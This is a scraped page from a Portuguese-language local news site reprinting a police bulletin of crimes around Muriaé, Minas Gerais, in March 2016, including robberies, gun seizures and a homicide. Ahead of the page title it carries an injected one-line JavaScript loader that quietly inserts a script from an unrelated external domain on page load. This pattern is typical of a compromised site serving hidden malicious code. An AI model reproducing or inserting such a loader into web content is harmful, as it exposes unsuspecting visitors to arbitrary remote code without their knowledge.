;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais 07/03/16. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais 07/03/16.

pmmgesOCORRÊNCIAS DE DESTAQUE MURIAÉ – 07/03/2016

76ª CIA PM – MURIAÉ

PM EFETUA PRISÃO/APREENSÃO DE AUTORES DE ROUBO EM MURIAÉ
Em 04/03/2016, por volta das 23h45min, na Rua Presidente Artur Bernardes, no centro da cidade, F.M.P., de 19 anos, J.P.S.N., de 27 anos e I.P.P.M., de 17 anos, foram vítimas de roubo, sendo subtraídos seus cordões e celulares. Durante rastreamento, militares localizaram os autores A.D.P.P., de 18 anos, L.S., também de 18 anos e F.S.M., de 17 anos, os quais tentaram evadir, porém foram capturados e reconhecidos pelas vítimas. Todos os materiais foram recuperados e a arma utilizada para a prática do delito foi localizada próxima aos autores, tratando-se de um revólver cal.32 com 01 cartucho intacto. Os autores foram presos e o menor apreendido, sendo todos eles conduzidos para a Delegacia de Polícia.
PM EFETUA PRISÃO POR PORTE ILEGAL DE ARMA DE FOGO EM BARÃO DO MONTE ALTO
Em 04/03/2016, por volta das 20h50min, na Rua Antônio Afonso Ferreira, no centro da cidade, militares abordaram o autor L.A.S., de 41 anos, o qual estava vindo de ônibus da cidade de Itaperuna/RJ para o distrito de Cachoeira Alegre, portando 01 revólver cal.32 municiado com 02 cartuchos intactos. Diante dos fatos, a arma e as munições foram apreendidas e o autor foi preso em flagrante delito, sendo conduzido para a Delegacia de Polícia.
PM APREENDE ARMA UTILIZADA EM HOMICÍDIO NA CIDADE DE MURIAÉ
Em 04/03/2016, por volta das 21h30min, na Rua Antônio Pereira Galvão, no Bairro Encoberta, militares foram acionados e informados sobre uma troca de tiros e que havia duas vítimas no local. Compareceram então ao local dos fatos e localizaram a vítima D.O.L., de 16 anos, atingido por sete disparos, sendo socorrido para o Hospital São Paulo, contudo não resistiu aos ferimentos e veio a óbito. Nas imediações, ainda encontraram a outra vítima, L.A.V., de 30 anos, atingido por quatro disparos e já sem os sinais vitais e próximo a ele, localizaram 01 revólver cal. 38 caído ao solo. Segundo informações, as vítimas estariam em guerra por disputa de ponto de droga. A arma localizada foi apreendida e entregue na Delegacia de Polícia.
PM APREENDE MENOR POR POSSE ILEGAL DE ARMA DE FOGO EM MURIAÉ
Em 05/03/2016, por volta das 09h25min, na Rua Simeão Féres, no Bairro da Barra, após denúncia anônima, militares compareceram à residência de F.L.V., de 17 anos, sendo autorizada pelos genitores uma busca na referida residência, logrando êxito em localizar no interior de uma bolsa 01 espingarda cal.28, 07 munições cal.28, 01 munição cal.12 e 20 munições cal.38, todas intactas. Diante dos fatos, o menor foi apreendido e conduzido para a Delegacia de Polícia juntamente com os materiais apreendidos.
PM EFETUA PRISÃO POR LESÃO CORPORAL POR DISPARO DE ARMA DE FOGO EM MURIAÉ
Em 06/03/2016, por volta das 16h44min, na Avenida Antônio Tureta, no Bairro São Joaquim, aṕos informações de que um homem havia sido vítima de diparos de arma de fogo, militares compareceram ao local e depararam com a vítima F.F.N., de 33 anos, o qual alegou ter sofrido dois disparos, e que o autor seria seu próprio pai, F.N.F., de 69 anos. A vítima foi socorrida ao Hospital São Paulo e permaneceu internada e o autor foi localizado em sua residência com 01 garrucha cal.22 no bolso com 02 munições intactas, o qual fez a entrega voluntária desta arma e ainda de outra garrucha do mesmo calibre desmuniciada. O autor confirmou a autoria dos disparos, alegando que não queria a presença do filho no imóvel, pois sempre que vai à casa é muito agressivo com ele e com a mãe e que ao tentar forçar a entrada na residência, não viu outra alternativa a não ser efetuar os disparos na intenção de intimidá-lo. Diante dos fatos, o autor foi preso e conduzido para a Delegacia de Polícia.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM
RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA
MURIAÉ / MG
TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.